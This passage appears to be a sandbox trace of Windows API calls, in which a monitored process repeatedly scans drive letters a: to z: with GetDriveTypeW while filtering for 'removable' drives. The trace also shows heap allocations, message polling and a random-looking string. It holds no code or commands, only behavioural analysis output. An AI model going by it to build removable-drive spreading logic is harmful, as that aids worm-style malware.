lpMsg=0x7dfb8c) returned 0 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.403] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.403] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.403] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.404] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0213.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.404] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.404] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.405] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.405] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.405] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.405] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.405] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.405] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.406] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.406] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.406] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.406] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.407] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.407] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.407] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.407] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.407] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.408] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.408] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.408] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.408] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.408] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.409] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.409] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.409] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.409] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.409] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.410] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0213.410] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0213.410] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.410] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.411] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.411] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0213.411] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.411] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.411] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.411] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.412] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.412] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.412] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.412] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.412] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.412] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.412] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.412] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.413] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.413] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.413] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.413] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.413] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.413] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.414] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.414] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.414] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.414] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.415] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.415] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.415] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.415] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.415] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.415] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.416] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.416] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.416] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.416] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.417] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0213.417] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0213.417] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.418] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.418] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0213.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.418] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.423] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0213.423] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.424] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0213.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.424] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.424] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.424] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.424] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.425] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.425] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.499] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.500] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.500] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.500] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.500] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.500] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.501] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.501] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.501] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.501] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.501] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.502] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.502] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.502] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.502] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.502] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.503] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.503] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.503] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.503] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.504] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.504] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.504] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0213.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0213.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.505] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0213.505] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 